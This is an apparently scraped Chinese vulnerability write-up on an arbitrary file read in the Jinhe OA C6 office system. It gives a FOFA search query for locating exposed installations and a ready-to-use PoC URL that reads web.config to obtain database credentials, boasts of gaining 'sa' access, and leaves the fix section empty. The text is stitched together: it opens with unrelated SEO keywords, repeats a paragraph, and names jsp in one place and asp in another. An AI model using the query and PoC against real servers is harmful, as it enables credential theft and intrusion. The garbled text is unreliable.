旅游网站设计与实现,百度网盘网页版入口官网,网站文档设置index.php,我想在家办个小型加工厂漏洞描述
金和OA协同办公管理系统C6软件共有20多个应用模块#xff0c;160多个应用子模块#xff0c;涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围#xff0c;从功能型的协同办公平台上升到管理型协同…漏洞描述
金和OA协同办公管理系统C6软件共有20多个应用模块160多个应用子模块涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围从功能型的协同办公平台上升到管理型协同管理平台并不断地更新完善全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。
该OA C6系统的download.jsp文件存在任意文件读取漏洞攻击者通过漏洞可以获取服务器的敏感信息。
免责声明
技术文章仅供参考任何个人和组织使用网络应当遵守宪法法律遵守公共秩序尊重社会公德不得利用网络从事危害国家安全、荣誉和利益未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失均由使用者本人负责。本文所提供的工具仅用于学习禁止用于其他
资产确定
fofaapp“金和网络-金和OA”
漏洞复现
1.执行POC即可获取Web.config文件内容其中包含数据库账号密码。
http://IP/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename/c6/web.config拿到了sa权限剩下的不用我说了大家都懂
修复方案
